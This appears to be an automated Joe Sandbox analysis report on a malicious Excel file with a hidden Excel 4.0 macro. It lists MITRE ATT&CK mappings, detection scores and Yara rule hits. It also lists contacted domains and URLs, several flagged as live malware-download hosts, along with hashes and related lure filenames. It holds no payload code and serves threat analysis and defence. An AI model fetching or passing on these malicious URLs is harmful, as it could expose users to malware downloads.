Source: EXCEL.EXE, 00000000.00000003.547400206.00000000055CE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.547431331.00000000055BC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.547422771.0000000007F25000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.547285231.0000000006940000.00000004.00000001.sdmp	Binary or memory string: vNWziajHgfS7tFDWOKyqrQrqAAAAAAAAAAAABkYAAAAAAAAAAAAAAHQWW/RLD1fagfOsuPn2DzAD
Source: EXCEL.EXE, 00000000.00000003.547285231.0000000006940000.00000004.00000001.sdmp	Binary or memory string: lElNfd+42a8nZDcf9Ci2HmvmcI8k2KFoAA+awMkAs84qyQDj/wDK8mOnmF4w52UYPDrT4pWggj5K

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match	File source: counter-1248368226.xls, type: SAMPLE
Source: Yara match	File source: C:\Users\user\Desktop\counter-1248368226.xls, type: DROPPED

Source: EXCEL.EXE, 00000000.00000002.753622502.0000000000760000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.753622502.0000000000760000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.753622502.0000000000760000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Path Interception	Process Injection2	Disable or Modify Tools1	OS Credential Dumping	Security Software Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution23	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting1	NTDS	File and Directory Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	System Information Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
counter-1248368226.xls	41%	ReversingLabs	Document-Excel.Downloader.EncDoc

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://playsis.com.br/viderJ	100%	Avira URL Cloud	malware
https://noithat117.vn/TSh7GBeIR/tiynh.htmlfs7y	0%	Avira URL Cloud	safe
http://schemas.openformatrg/drawml/2006/spreadsheetD	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://playsis.com.br/qJSi	100%	Avira URL Cloud	malware
http://schemas.openformatrg/package/2006/content-t	0%	URL Reputation	safe
https://playsis.com	0%	Avira URL Cloud	safe
https://greenflag.esp.br/	0%	Avira URL Cloud	safe
https://playsis.com.br/	100%	Avira URL Cloud	malware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://greenflag.esp.br/~	0%	Avira URL Cloud	safe
https://playsis.com.br/qJSL1BN5V/tiynh.html117.vn/TSh7GBeIR/tiynh.htmlink	100%	Avira URL Cloud	malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://playsis.com.br/qJSL117.	100%	Avira URL Cloud	malware
http://schemas.open	0%	URL Reputation	safe
https://playsis.cre	0%	Avira URL Cloud	safe
https://noithat117.vn/TSh7GBeIR/tiynh.html	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://schemas.openformatrg/package/2006/r	0%	URL Reputation	safe
https://greenflag.esp.br/yuINdRbM/tiynh.htmltv7y	0%	Avira URL Cloud	safe
https://playsis.com.br/qJSL1BN5V/tiynh.html3W(y	100%	Avira URL Cloud	malware
https://greenflag.esp.br/yuINdRbM/tiynh.html	0%	Avira URL Cloud	safe
https://playsis.com.br/qJSL1B.b	100%	Avira URL Cloud	malware
https://noithat117.vn/	0%	Avira URL Cloud	safe
https://playsis.com.br/qhtt	100%	Avira URL Cloud	malware
http://www.%s.comPA	0%	URL Reputation	safe
https://playsis.com.boi	0%	Avira URL Cloud	safe
https://playsis.com.br/qJSL1BN5V/tiynh.html	100%	Avira URL Cloud	malware
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://playsis.com.br/qJSL1BNt	100%	Avira URL Cloud	malware
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
greenflag.esp.br	108.179.192.98	true	false	unknown
playsis.com.br	162.241.2.78	true	false	unknown
noithat117.vn	103.28.36.171	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://noithat117.vn/TSh7GBeIR/tiynh.html	false	Avira URL Cloud: safe	unknown
https://greenflag.esp.br/yuINdRbM/tiynh.html	false	Avira URL Cloud: safe	unknown
https://playsis.com.br/qJSL1BN5V/tiynh.html	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	regsvr32.exe, 00000004.00000002.433299064.0000000004A30000.00000002.00020000.sdmp	false		high
http://investor.msn.com	EXCEL.EXE, 00000000.00000002.756462860.0000000004DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.458941535.0000000004840000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433299064.0000000004A30000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	EXCEL.EXE, 00000000.00000002.756462860.0000000004DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.458941535.0000000004840000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433299064.0000000004A30000.00000002.00020000.sdmp	false		high
https://playsis.com.br/viderJ	EXCEL.EXE, 00000000.00000002.757830393.00000000055A1000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://noithat117.vn/TSh7GBeIR/tiynh.htmlfs7y	EXCEL.EXE, 00000000.00000002.757569584.00000000054D6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/server1.crl0	EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	false		high
http://schemas.openformatrg/drawml/2006/spreadsheetD	EXCEL.EXE, 00000000.00000002.758982507.0000000006966000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://playsis.com.br/qJSi	EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.openformatrg/package/2006/content-t	EXCEL.EXE, 00000000.00000002.758868165.0000000006936000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://playsis.com	EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://greenflag.esp.br/	EXCEL.EXE, 00000000.00000003.412689926.0000000005699000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.758475130.0000000005667000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.412675282.0000000005697000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://playsis.com.br/	EXCEL.EXE, 00000000.00000002.757830393.00000000055A1000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://greenflag.esp.br/~	EXCEL.EXE, 00000000.00000003.412689926.0000000005699000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.758475130.0000000005667000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.412675282.0000000005697000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://playsis.com.br/qJSL1BN5V/tiynh.html117.vn/TSh7GBeIR/tiynh.htmlink	EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	EXCEL.EXE, 00000000.00000002.756774289.0000000004FB7000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.459166553.0000000004A27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433499004.0000000004C17000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	EXCEL.EXE, 00000000.00000002.756462860.0000000004DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.458941535.0000000004840000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433299064.0000000004A30000.00000002.00020000.sdmp	false		high
https://playsis.com.br/qJSL117.	EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.open	EXCEL.EXE, 00000000.00000002.758868165.0000000006936000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.758982507.0000000006966000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.761155154.0000000007AB6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.761078798.00000000071E6000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	EXCEL.EXE, 00000000.00000002.756774289.0000000004FB7000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.459166553.0000000004A27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433499004.0000000004C17000.00000002.00020000.sdmp	false		high
https://playsis.cre	EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	EXCEL.EXE, 00000000.00000002.756774289.0000000004FB7000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.459166553.0000000004A27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433499004.0000000004C17000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://schemas.openformatrg/package/2006/r	EXCEL.EXE, 00000000.00000002.761155154.0000000007AB6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.761078798.00000000071E6000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	regsvr32.exe, 00000003.00000002.458519777.0000000003A60000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.432892506.0000000003B40000.00000002.00020000.sdmp	false		high
https://greenflag.esp.br/yuINdRbM/tiynh.htmltv7y	EXCEL.EXE, 00000000.00000002.757569584.00000000054D6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://playsis.com.br/qJSL1BN5V/tiynh.html3W(y	EXCEL.EXE, 00000000.00000002.758475130.0000000005667000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://playsis.com.br/qJSL1B.b	EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://noithat117.vn/	EXCEL.EXE, 00000000.00000002.757830393.00000000055A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	EXCEL.EXE, 00000000.00000002.756462860.0000000004DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.458941535.0000000004840000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433299064.0000000004A30000.00000002.00020000.sdmp	false		high
https://playsis.com.br/qhtt	EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.%s.comPA	regsvr32.exe, 00000003.00000002.458519777.0000000003A60000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.432892506.0000000003B40000.00000002.00020000.sdmp	false	URL Reputation: safe	low
https://playsis.com.boi	EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://playsis.com.br/qJSL1BNt	EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://secure.comodo.com/CPS0	EXCEL.EXE, 00000000.00000002.757698394.0000000005541000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	false		high
http://servername/isapibackend.dll	regsvr32.exe, 00000003.00000002.458167043.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.432455661.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.486891484.0000000001DA0000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
162.241.2.78	playsis.com.br	United States	26337	OIS1US	false
108.179.192.98	greenflag.esp.br	United States	46606	UNIFIEDLAYER-AS-1US	false
103.28.36.171	noithat117.vn	Viet Nam	131353	NHANHOA-AS-VNNhanHoaSoftwarecompanyVN	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532593
Start date:	02.12.2021
Start time:	14:26:54
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 8s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	counter-1248368226.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.expl.winXLS@7/4@3/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe Execution Graph export aborted for target EXCEL.EXE, PID 2804 because there are no executed function VT rate limit hit for: /opt/package/joesandbox/database/analysis/532593/sample/counter-1248368226.xls

Simulations

Behavior and APIs

Time	Type	Description
14:27:28	API Interceptor	373x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.241.2.78	#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe	Get hash	malicious	Browse	www.entreiparaodigital.com/jdkn/?1b0=I3SbQcfk5mKncCcQGw+gNueSmbNJxTZBbu+zAfDoz/ZWf2NQtBtv1zSdSMyJHdn3WlwE&mJBHHf=B0DPf0S8Ibot
108.179.192.98	counter-119221000.xls	Get hash	malicious	Browse
	counter-119221000.xls	Get hash	malicious	Browse
	tr.xls	Get hash	malicious	Browse
	tr.xls	Get hash	malicious	Browse
	counter-1389180325.xls	Get hash	malicious	Browse
	counter-1389180325.xls	Get hash	malicious	Browse
103.28.36.171	211094.exe	Get hash	malicious	Browse	www.nhadat9chu.com/iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnY

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
noithat117.vn	counter-119221000.xls	Get hash	malicious	Browse	103.28.36.171
	counter-119221000.xls	Get hash	malicious	Browse	103.28.36.171
	tr.xls	Get hash	malicious	Browse	103.28.36.171
	tr.xls	Get hash	malicious	Browse	103.28.36.171
	counter-1389180325.xls	Get hash	malicious	Browse	103.28.36.171
	counter-1389180325.xls	Get hash	malicious	Browse	103.28.36.171
playsis.com.br	counter-119221000.xls	Get hash	malicious	Browse	162.241.2.78
	counter-119221000.xls	Get hash	malicious	Browse	162.241.2.78
	tr.xls	Get hash	malicious	Browse	162.241.2.78
	tr.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1389180325.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1389180325.xls	Get hash	malicious	Browse	162.241.2.78
greenflag.esp.br	counter-119221000.xls	Get hash	malicious	Browse	108.179.192.98
	counter-119221000.xls	Get hash	malicious	Browse	108.179.192.98
	tr.xls	Get hash	malicious	Browse	108.179.192.98
	tr.xls	Get hash	malicious	Browse	108.179.192.98
	counter-1389180325.xls	Get hash	malicious	Browse	108.179.192.98
	counter-1389180325.xls	Get hash	malicious	Browse	108.179.192.98

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OIS1US	a2SyRyTizn.exe	Get hash	malicious	Browse	162.241.203.110
	TSmtIL1EeJ.exe	Get hash	malicious	Browse	162.241.203.110
	counter-119221000.xls	Get hash	malicious	Browse	162.241.2.78
	counter-119221000.xls	Get hash	malicious	Browse	162.241.2.78
	tr.xls	Get hash	malicious	Browse	162.241.2.78
	tr.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1389180325.xls	Get hash	malicious	Browse	162.241.2.78
	counter-1389180325.xls	Get hash	malicious	Browse	162.241.2.78
	PURCHASE ORDER HECTRO.xlsx	Get hash	malicious	Browse	162.241.85.81
	chase.xls	Get hash	malicious	Browse	162.241.2.167
	chase.xls	Get hash	malicious	Browse	162.241.2.167
	private-1915056036.xls	Get hash	malicious	Browse	162.241.2.167
	private-1915056036.xls	Get hash	malicious	Browse	162.241.2.167
	private-1910485378.xls	Get hash	malicious	Browse	162.241.2.167
	private-1910485378.xls	Get hash	malicious	Browse	162.241.2.167
	Amended Order.xlsx	Get hash	malicious	Browse	162.241.2.151
	aLTbT3KJXg.exe	Get hash	malicious	Browse	192.185.147.203
	qWeAgF7WNO.exe	Get hash	malicious	Browse	192.185.147.203
	Page_1of3#Ud83d#Udce0.html	Get hash	malicious	Browse	162.241.70.204
	INV8897.xlsx	Get hash	malicious	Browse	162.241.2.97
UNIFIEDLAYER-AS-1US	CU-6431 report.xlsm	Get hash	malicious	Browse	162.240.9.126
	CU-6431 report.xlsm	Get hash	malicious	Browse	162.240.9.126
	DkX9HVJTmi.exe	Get hash	malicious	Browse	108.167.135.122
	Shipping report -17420.xlsx	Get hash	malicious	Browse	162.241.169.32
	SCAN_7295943480515097.xlsm	Get hash	malicious	Browse	162.240.9.126
	SCAN_7295943480515097.xlsm	Get hash	malicious	Browse	162.240.9.126
	INVOICE.exe	Get hash	malicious	Browse	162.214.80.6
	img20048901738_Pago.pdf.exe	Get hash	malicious	Browse	192.185.115.3
	PaCJ39hC4R.xlsx	Get hash	malicious	Browse	162.241.126.156
	PaCJ39hC4R.xlsx	Get hash	malicious	Browse	162.241.126.156
	New order documents. pdf..............exe	Get hash	malicious	Browse	108.179.232.76
	part-1500645108.xlsb	Get hash	malicious	Browse	162.241.62.201
	img20048901740_Pago.pdf.exe	Get hash	malicious	Browse	192.185.115.3
	part-1500645108.xlsb	Get hash	malicious	Browse	162.241.62.201
	shedy.exe	Get hash	malicious	Browse	162.241.218.172
	product list.xlsx	Get hash	malicious	Browse	162.241.218.178
	accounts...exe	Get hash	malicious	Browse	192.185.164.148
	New product of Aluminium Profile.exe	Get hash	malicious	Browse	192.185.84.191
	BL. AWSMUNDAR3606-21.exe	Get hash	malicious	Browse	162.241.148.56
	draft_inv dec21.exe	Get hash	malicious	Browse	162.241.120.147

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	CU-6431 report.xlsm	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	DHL Original shipping Document_pdf.ppam	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	New Price List.ppam	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	SCAN_7295943480515097.xlsm	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	Hotel Guest List.ppam	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	IRQ2107798.ppam	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	AWB.ppam	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	FILE_915494026923219.xlsm	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	IRQ2107797.ppam	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	PaCJ39hC4R.xlsx	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	part-1500645108.xlsb	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	invoice template 33142738819.docx	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	item-40567503.xlsb	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	FILE_464863409880121918.xlsm	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	item-107262298.xlsb	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	item-1202816963.xlsb	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	counter-119221000.xls	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	box-1688169224.xlsb	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	box-1689035414.xlsb	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171
	survey-1805824485.xls	Get hash	malicious	Browse	162.241.2.78 108.179.192.98 103.28.36.171

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\DAB5.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3B4EA5BD8BBCDF15.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.9736664173647833
Encrypted:	false
SSDEEP:	768:9kxKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgALlNp:9oKpb8rGYrMPe3q7Q0XV5xtezEsi8/dh
MD5:	193AED4E8225F55CE53F3DE42895D51E
SHA1:	35C2A28EB87E87B40275737D4EE569B5D45BF237
SHA-256:	92B61AE08A4A89E9086400FC634F2A39313F3D685BDAF4810059B265CED6A12B
SHA-512:	C13251F8EB2434D37697F95B56EA9DF4B44AFC4A1FBBF45F1B765926C7E4AF45A91D0DB5EE835A5B109EB90106D2B368821E0A55D07C72A582856EE260D29CBD
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFEAC2A307FBF2A788.TMP Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\counter-1248368226.xls Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 30 06:43:37 2021, Security: 0
Category:	dropped
Size (bytes):	132608
Entropy (8bit):	6.276322779310474
Encrypted:	false
SSDEEP:	3072:bKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgRJyVceeiE/RzPQUu/zLOQy:bKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgzx
MD5:	79614FAA563C6EF0EB88F17D98CD485F
SHA1:	30A312B65370CBC0B211967B46E4B4B9610CA873
SHA-256:	14852BCA3BFE3C4B276B639C26EED9A65C7754150015EC16EF323C8408D66F2C
SHA-512:	E68DE46993A2215DB3BB111B926C0F880D54D4E78E7AF4F48094190CD7633BBE9DC8873817226676B39C6EB200A7DBE30EC45DD7D32D886FC2784F3455A55BC0
Malicious:	true
Yara Hits:	Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\counter-1248368226.xls, Author: John Lambert @JohnLaTwC Rule: JoeSecurity_HiddenMacro, Description: Yara detected hidden Macro 4.0 in Excel, Source: C:\Users\user\Desktop\counter-1248368226.xls, Author: Joe Security
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user.8.=. B.....a.........=...........................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 30 06:43:37 2021, Security: 0
Entropy (8bit):	6.275934021202815
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	counter-1248368226.xls
File size:	132608
MD5:	30a0db47a66a3d3173457755bb166529
SHA1:	c852a219defe8ab726b72f8792386e35428b46dc
SHA256:	bdd97906934a97d1081e68ac8f71c98a169c4af705c17b73b69b3649df216885
